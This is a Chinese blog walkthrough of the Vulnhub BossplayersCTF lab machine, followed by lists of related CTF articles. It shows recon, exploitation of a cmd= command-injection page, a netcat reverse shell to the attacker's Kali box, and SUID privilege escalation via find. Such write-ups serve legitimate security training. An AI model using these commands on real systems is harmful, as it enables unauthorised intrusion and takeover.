看完这篇 教你玩转渗透测试靶机vulnhub——BossplayersCTF

2023-11-15

Vulnhub靶机介绍:

vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。

这是新手CTF得靶机还是老样子找到flag.txt即可。

Vulnhub靶机下载:

官网地址:https://www.vulnhub.com/entry/bossplayersctf-1,375/

Vulnhub靶机安装:

下载好了把安装包解压 然后使用Oracle VM即可。
在这里插入图片描述
在这里插入图片描述

Vulnhub靶机漏洞详解:

①:信息收集:

kali里使用netdiscover发现主机
在这里插入图片描述
渗透机:kali IP :192.168.0.101 靶机IP :192.168.0.100

使用命令:nmap -sS -sV -A -n 192.168.0.100
在这里插入图片描述

发现开启了80端口和22端口,先访问一下80端口 dirb扫一下后台发现index.txt,robots.txt,server-status 依次进行访问。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
先访问一下robots.txt 发现了一串base64加密数值 放kali解密一下 它让我们在努力点兄弟,哈哈哈哈。
在这里插入图片描述
在这里插入图片描述
我们再看看logs.php 看源码会比较完整一点,发现并没有什么可用信息继续访问server-status 也没有可用信息。
在这里插入图片描述
在这里插入图片描述
在看看index.html 查看一下源码 在最下面发现一串base64 继续解码解了三次发现一个php文件:workinginprogress.php
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

②:命令执行漏洞:

访问这个文件好像可以命令执行 可以使用工具wfuzz检测 我这里直接手动了

http://192.168.0.100/workinginprogress.php?cmd=id

在这里插入图片描述
在这里插入图片描述

③:反弹shell:

先看看靶机里面有没有nc 可以利用漏洞使用命令:http://192.168.0.100/workinginprogress.php?cmd=ls /usr/bin|grep nc
在这里插入图片描述
接着开启本机kali 开启监听端口6666 执行:192.168.0.100/workinginprogress.php?cmd=nc 192.168.0.101 6666 -e/bin/bash

使用python开启交互:python -c "import pty;pty.spawn('/bin/bash')"
在这里插入图片描述

④:suid提权:

使用命令:find / -perm -u=s -type f 2>/dev/null 查找具有suid权限的文件,通过find提权,获得权限。
在这里插入图片描述
使用命令:find . -exec /bin/bash -p \;
在这里插入图片描述

⑤:获取flag:

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
至此得到了congratulations祝贺自己,渗透测试结束。

Vulnhub靶机渗透总结:

这个靶场比较适合新手 比较基础容易上手 总结一下知识点:
①:netdiscover 工具得使用
②:nmap的基础使用 (具体可以学一下脚本的使用)
③:dirb (web目录扫描工具)
④:wfuzz 工具得使用
⑤:suid提权 (Linux提权大家可以学习一下)
第一次凌晨熬夜创作,希望对刚学网安的小白有所帮助 (最后一天假期肝一下,明天返校了)感谢支持!!
**

本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

看完这篇 教你玩转渗透测试靶机vulnhub——BossplayersCTF 的相关文章

  • [CTF/网络安全] 攻防世界 disabled_button 解题详析

    CTF 网络安全 攻防世界 disabled button 解题详析 input标签 姿势 disable属性 总结 题目描述 X老师今天上课讲了前端知识 然后给了大家一个不能按的按钮 小宁惊奇地发现这个按钮按不下去 到底怎么才能按下去呢
  • log4j2漏洞原理简述

    影响版本 Apache Log4j 2 x lt 2 14 1 jdk不知道 有知道的师傅麻烦告诉下 漏洞原理 由于Apache Log4j存在递归解析功能 lookup 未取得身份认证的用户 可以从远程发送数据请求输入数据日志 轻松触发漏
  • BUUCTF:[GXYCTF2019]BabyUpload1

    文件上传漏洞 不过这里我要吐槽一下 这个题首先他不允许传 png文件 再者 jpg文件不能大 打了也报错 传不上去 可想而知 我当时在做这个题的时候跟见了鬼一样难受 什么文件都传不了 接着做题吧 试着传一个PHP文件 告诉我不能传ph开头的
  • adworld-web2

    web2 GFSJ0627积分 2金币 2 91最佳Writeup由 Robert Wei 提供 收藏 反馈 难度 2 方向 Web 题解数 108 解出人数 10185 题目来源 CTF 题目描述 解密 题目场景 http 61 147
  • Burp Suit+Phpstudy+Pikachu搭建Web安全练习环境

    1 软件安全测试工具Burp Suit安装 1 1 社区版 进入官网 Download Burp Suite Community Edition PortSwigger 进行下载安装即可 1 2 专业版 搜索Burp Suit2 0 11从
  • 网络安全实验室CTF练习部分题目(持续更新)

    1 脚本关 微笑一下 过关地址 http lab1 xseclab com base13 ead1b12e47ec7cc5390303831b779d47 index php 查看源代码 include flag php smile 1 i
  • 实验吧 web题--代码审计类

    一 因缺思汀的绕过 1 web题常规套路就是查看源代码 于是右击查看源代码发现 br 构造url http ctf5 shiyanbar com web pcat source txt 查看php代码 2 关键php代码 if mysql
  • buuctf - crypto - Rabbit

    rabbit 加解密 在线Rabbit加密 Rabbit解密 在线工具
  • CTF BugKu平台——Crypto篇刷题记录(后续更新)

    CTF BugKu平台 Crypto篇 前言 抄错的字符 聪明的小羊 ok lt gt 把猪困在猪圈里 你喜欢下棋吗 小山丘的秘密 EN 气泡 你以为是md5吗 Math English easy crypto 黄道十二官 一段新闻 7 1
  • disabled_button 攻防世界

    1 第一步还是看题目 重要知识点 按钮按不下去 前端知识 例如下面的代码
  • swift编程入门(非常详细)从零基础入门到精通,看完这一篇就够了

    文章目录 1 读后概述 2 语法笔记 2 1 说明 2 2 基础类型 2 3 运算符 2 4 字符与字符串 2 4 控制流 2 5 函数 2 6 闭包 2 7 枚举 结构体 类 2 8 类的构造与析构 2 9 属性监听器 2 10 类的继承
  • sqli-labs靶场Less-7

    备注 虽然从首页进来就知道是dump into outfile 但我还是假设按不知道的流程来一步步尝试 这样才会印象深刻 不然我觉得失去练习的意义了 1 访问首页 Less 7 index php id 1 这里的传参点是id 探测六步 判
  • 全国大学生信息安全竞赛真题(CTF)

    web篇 https blog csdn net csu vc article details 78011716 https www cnblogs com iamstudy articles 2017 quanguo ctf web wr
  • web做题记录(buuoj,jarvis,攻防世界,bugku,hackme)

    web做题笔记 文章目录 web做题笔记 buuoj easy tornado 随便注 warmup easysql 高明的黑客 jarvisoj re flag在管理员手上 api调用 chopper 图片上传漏洞 inject web
  • 攻防世界 Web simple_php

    攻防世界 Web simple php 1 分析源代码 2 得到flag 1 分析源代码 a 和 b 都是通过GOT传入 第一个if可以获取flag1 但是要求a0 atrue 但是如果
  • Java安全知识share

    这里简单的介绍一下自己创建的知识星球 为什么要用知识星球呢 一方面他有APP然后方便使用里面的文章标签等功能 另一方面可能有一点点 哈哈哈 总的来说是方便使用 该知识星球包括Java相关的安全知识和其他相关的安全知识php nodejs C
  • [SUCTF 2019]EasyWeb

    SUCTF 2019 EasyWeb 打开环境是一段代码 其中if preg match x00 0 9A Za z x7F i hhh 这个判断是难点 它的绕过可以参考这篇文章https www h3399 cn 201909 72364
  • ATT&CK红队评估实战靶场-1(全网最细)

    声明 该系列文章首发于公众号 Y1X1n安全 转载请注明出处 本公众号所分享内容仅用于网安爱好者之间的技术讨论 所有渗透及工具的使用都需获取授权 禁止用于违法途径 否则需自行承担 本公众号及作者不承担相应的后果 ATT CK红队评估实战靶场
  • NewportBlakeCTF 2023(NBCTF 2023) Web方向 wp 全

    一共四个web 非常简单的一场国际赛 Inspector Gadget 题目描述 While snooping around this website inspector gadet lost parts of his flag Can y
  • 【CTF必看】从零开始的CTF学习路线(超详细),让你从小白进阶成大神!

    最近很多朋友在后台私信我 问应该怎么入门CTF 个人认为入门CTF之前大家应该先了解到底 什么是CTF 而你 学CTF的目的又到底是什么 其次便是最好具备相应的编程能力 若是完全不具备这些能力极有可能直接被劝退 毕竟比赛的时候动不动写个脚本

随机推荐

  • SpringMVC单元测试之MockMVC,模拟登录

    在一些实际开发中 很多情况下需要对数据库进行操作 但是这里的操作就设计到用户权限 所谓权限验证就是拿到用户客户端登录后的token 在代码中进行校验 一般都是在controller层首先进行校验 如果校验成功 则执行之后操作 否则 采取相应
  • Java语言基础

    01 01 计算机基础知识 计算机概述 了解 A 什么是计算机 计算机在生活中的应用举例 计算机 Computer 全称 电子计算机 俗称电脑 是一种能够按照程序运行 自动 高速处理海量数据的现代化智能电子设备 由硬件和软件所组成 没有安装
  • Dart基础语言 — 函数 Function

    Dart基础语言 函数 Function 函数定义 int add int x return x 1 调用 add 1 可选参数 int add int x int y int z if y null y 1 if z null z 1 r
  • [!] Unable to determine Swift version for the following pods:

    问题 Unable to determine Swift version for the following pods contact the author or set the SWIFT VERSION attribute pod in
  • Java基础 - XML解析转成Bean以及Bean转成XML(附带案例)

    文章目录 1 JAXB Java Architecturefor XML Binding 面向XML绑定的Java体系结构 1 1 注解 1 2 使用 测试1 反序列化xml文件成JavaBean对象 测试2 序列化普通JavaBean对象
  • java 二进制变量_java变量、二进制、数据类型、原码、补码、反码

    1 变量 1 他 她 我 你 某人 佚名 旺财 X man x 1 您好 它 变量就是自然语言中的代词 2 int age 15 00000000 00000000 00000000 00001111 3 Java 中的变量 a Java是
  • IntelliJ IDEA 2020.3 重大特性

    今天发现 idea 2020 3 版本发布了 那么废话不多说 赶紧更新起来 ps 继续推荐使用 toolbox 进行安装 首先欢迎页变化 1 管理项目 2 配置 IDE 界面 主要就是主题 字体 快捷键等设置 3 插件 已经安装的插件和插件
  • 2023.8.21--微信小程序uni-app

    微信小程序 day1 微信小程序开发 下载微信开发者工具 注册小程序账号 注册小程序账号 填写信息 获取小程序的 AppID 搭建开发环境 认识小程序 小程序的页面布局 小程序组件 标签 view 定义块级区块 相当于 html 中的 di
  • es基础操作

    列出所有索引 列出所有索引 列出所有的数据库 GET cat indices v 添加索引 PUT goods settings 副本数 number of replicas 1 分片数 number of shards 5 删除索引 DE
  • verilog中的操作符

    verilog中的操作运算符如下 1 算数操作符 2 关系操作符 3 相等操作符 4 逻辑操作符 5 按位操作符 6 归约操作符 7 移位操作符 8 条件操作符 9 连接操作符 10 赋值操作符 下面做详细介绍 1 算数操作符 加 减 乘
  • vue3+vite 全局组件注册与使用

    前言 vite和我们的webpack是不同的 这里没办法用require 但是他也有自己的引入文件的方法 是 import meta glob 实现效果 vite方法官方入口 功能 Vite 官方中文文档下一代前端工具链https cn v
  • 张五常的《读书方法》

    首先声明 我要谈的是为知识而读书的方法 不是为考试而读书的方法 后者 香港的学生都是专家 猜题目 背课文之能 世间少有 但为知识而读书可以帮助考试 为考试而读书却未必可助知识的增长 知识是读书的目的 An End 考试只是一个方法 A Me
  • react antd里面的Popover属性content怎么循环写内容,代码展示

    可以使用Antd中的Popover组件 来循环渲染内容 例如 const list name 张三 age 18 name 李四 age 21 return
  • 动画状态机Animator-Unity3d

    该模型一直处于奔跑状态 点击跳跃则跳跃一次后回到奔跑状态 点击攻击后则攻击一次回到奔跑状态 控制代码如下 using UnityEngine using System Collections 该人物一直处于奔跑状态 点击跳跃则跳跃一次后回到
  • 前端工具集合(js框架、ui框架、开发工具...)

    vue3 vue3官网 Vue js pc端开发ui框架 element plus 一个 Vue 3 UI 框架 Element Plus 移动端ui框架 vant Vant Mobile UI Components built on Vu
  • [Unity3D]场景间切换与数据传递(以及物体删除技巧)

    Unity3D 场景间切换与数据传递 以及物体删除技巧 2009 09 16 15 03 47 分类 Unity3D 举报 字号 订阅 先介绍一些基本函数 具体用法自己查文档 1 场景切换 Application LoadLevel Lev
  • node.js基础学习

    什么是node 简单来说 node是JS的一种运行环境 在此之前 我们都知道JS可以在浏览器中运行 可以为网页添加各种交互 因此 浏览器也是JS的运行环境 随着Chrome浏览器的发布 带来了全新的V8引擎 经过多年的发展和优化 性能和安全
  • python数据分析--缺失值的填充与删除

    数据来源 和鲸社区 Numpy Pandas数据处理 第五关 主要内容 查看是否有缺失值 填充缺失值fillna 删除缺失值 导入数据 import pandas as pd filepath10 home mw input Pandas
  • 计算机网络安全影响因素毕业论文,计算机网络安全分析与防范措施--毕业论文.doc...

    计算机网络安全分析与防范措施 毕业论文 doc 中央广播电视大学 毕业设计 论文 题 目 计算机网络安全防范措施 2 目 录 3 引 言 4 第一章 计算机网络简介 5 一 数字语音多媒体三网合一 5 二 IPv6协议 5 第二章 计算机网
  • 看完这篇 教你玩转渗透测试靶机vulnhub——BossplayersCTF

    Vulnhub靶机BBossplayersCTF渗透测试详解 Vulnhub靶机介绍 Vulnhub靶机下载 Vulnhub靶机安装 Vulnhub靶机漏洞详解 信息收集 命令执行漏洞 反弹shell suid提权 获取flag Vulnh